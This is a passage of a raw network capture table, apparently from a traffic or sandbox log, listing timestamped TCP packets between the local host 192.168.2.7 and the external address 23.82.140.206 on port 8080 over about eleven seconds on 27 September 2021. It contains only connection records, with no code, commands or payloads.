                                          Sep 27, 2021 20:26:59.743856907 CEST499208080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:59.743860960 CEST80804992023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:59.743880033 CEST80804992023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:59.743969917 CEST499208080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:59.744720936 CEST499208080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:59.876044035 CEST80804992023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:59.991660118 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.123622894 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.123742104 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.124540091 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.256234884 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.258785009 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.258961916 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.390422106 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.391028881 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.391457081 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.394968033 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.523658037 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.526873112 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.529227018 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.529381037 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.530085087 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.530113935 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.530122042 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.530129910 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.530144930 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.530178070 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.530222893 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.531047106 CEST499248080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.664016008 CEST80804992423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.804457903 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.936801910 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:00.936956882 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:00.937632084 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.069109917 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.071847916 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.071959019 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.203547001 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.203623056 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.204286098 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.206475019 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.336081028 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.338237047 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.340068102 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.340102911 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.340126038 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.340137005 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.340157032 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.340167046 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.340186119 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.340207100 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.340233088 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.340250969 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.340305090 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.340924025 CEST499298080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.472608089 CEST80804992923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.587393999 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.719574928 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.719697952 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.720438004 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.851047993 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.853470087 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.853552103 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.984283924 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:01.984374046 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.984708071 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:01.986700058 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.116417885 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.118372917 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.120599031 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.120636940 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.120663881 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.120687962 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.120712042 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.120721102 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.120733023 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.120759964 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.120807886 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.121603966 CEST499348080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.252520084 CEST80804993423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.383002043 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.509835005 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.510138035 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.511328936 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.638163090 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.639476061 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.639585972 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.766237974 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.766350031 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.766936064 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.770014048 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.892606974 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.897475004 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.898927927 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.898957968 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.898972034 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.898988962 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.899012089 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.899024963 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:02.899081945 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.899141073 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:02.900021076 CEST499398080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.026345015 CEST80804993923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.148907900 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.281779051 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.282228947 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.283057928 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.414505959 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.417099953 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.418167114 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.549660921 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.549768925 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.550295115 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.553092003 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.681137085 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.685097933 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.686850071 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.686877966 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.686894894 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.686984062 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.686991930 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.687012911 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.687027931 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.687032938 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.687067032 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.687663078 CEST499448080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:03.818505049 CEST80804994423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:03.945569992 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.078176975 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.078290939 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.079494953 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.206273079 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.208379984 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.208503008 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.334173918 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.334250927 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.334738970 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.338000059 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.460412979 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.464307070 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.466392040 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.466418982 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.466434002 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.466451883 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.466470957 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.466491938 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.466515064 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.466573954 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.467211962 CEST499498080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.593018055 CEST80804994923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.727197886 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.855057955 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.855212927 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.856163979 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:04.983263969 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.983292103 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:04.983380079 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.108633041 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.108735085 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.109246969 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.111951113 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.234174013 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.236884117 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.238537073 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.238650084 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.238682032 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.238739014 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.238779068 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.238801003 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.238815069 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.238876104 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.238976955 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.239468098 CEST499538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.365833044 CEST80804995323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.493215084 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.618581057 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.619174957 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.620239973 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.745119095 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.747984886 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.748094082 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.873131990 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:05.873315096 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.873766899 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.876399994 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:05.998672962 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.001571894 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.003216028 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.003245115 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.003257990 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.003355980 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.003385067 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.003395081 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.003408909 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.003429890 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.003489017 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.004328966 CEST499578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.130462885 CEST80804995723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.258744955 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.390369892 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.390475035 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.391812086 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.523766041 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.526407957 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.526585102 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.658411980 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.658571959 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.659100056 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.661292076 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.790457964 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.793067932 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.794704914 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.794748068 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.794775963 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.794817924 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.794857979 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.794868946 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.794917107 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:06.794986010 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.795811892 CEST499628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:06.928083897 CEST80804996223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.055177927 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.180126905 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.180267096 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.181195021 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.306435108 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.309578896 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.310142040 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.436578035 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.436966896 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.437522888 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.440826893 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.564444065 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.568037987 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.569444895 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.569618940 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.569735050 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.569756985 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.569801092 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.569813967 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.569875002 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.569886923 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.569901943 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.569933891 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.569982052 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.571253061 CEST499638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.697333097 CEST80804996323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.820302963 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.945127010 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:07.945317030 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:07.946085930 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.072240114 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.075731993 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.075891972 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.200604916 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.200962067 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.201754093 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.205441952 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.326836109 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.330243111 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.332346916 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.332375050 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.332444906 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.332477093 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.332475901 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.332501888 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.332508087 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.332545042 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.332559109 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.333993912 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.334901094 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.334930897 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.461369038 CEST80804996423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.462476969 CEST499648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.586828947 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.718417883 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.718698025 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.719647884 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.851515055 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.853610992 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.853734016 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.985374928 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:08.986917973 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.987612009 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:08.991635084 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.119096041 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.123347044 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.127999067 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.131534100 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.131653070 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.131676912 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.131711006 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.131740093 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.131763935 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.131834030 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.131895065 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.140722990 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.141601086 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.141612053 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.273581028 CEST80804996523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.275708914 CEST499658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.399864912 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.530669928 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.530782938 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.531620026 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.662749052 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.666371107 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.666551113 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.797560930 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.797748089 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.798379898 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.801505089 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.930192947 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.932499886 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.934175014 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.934220076 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.934360981 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.934482098 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.934487104 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.934566975 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.934721947 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.934751987 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.934771061 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:09.935333014 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:09.936197042 CEST499668080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.067514896 CEST80804996623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.197602987 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.323236942 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.323355913 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.324620008 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.450484991 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.455210924 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.455427885 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.581384897 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.581665993 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.582329035 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.586209059 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.708214045 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.711970091 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.712757111 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.712883949 CEST499678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:27:10.712934017 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.712965012 CEST80804996723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:27:10.712996960 CEST499678080192.168.2.723.82.140.206
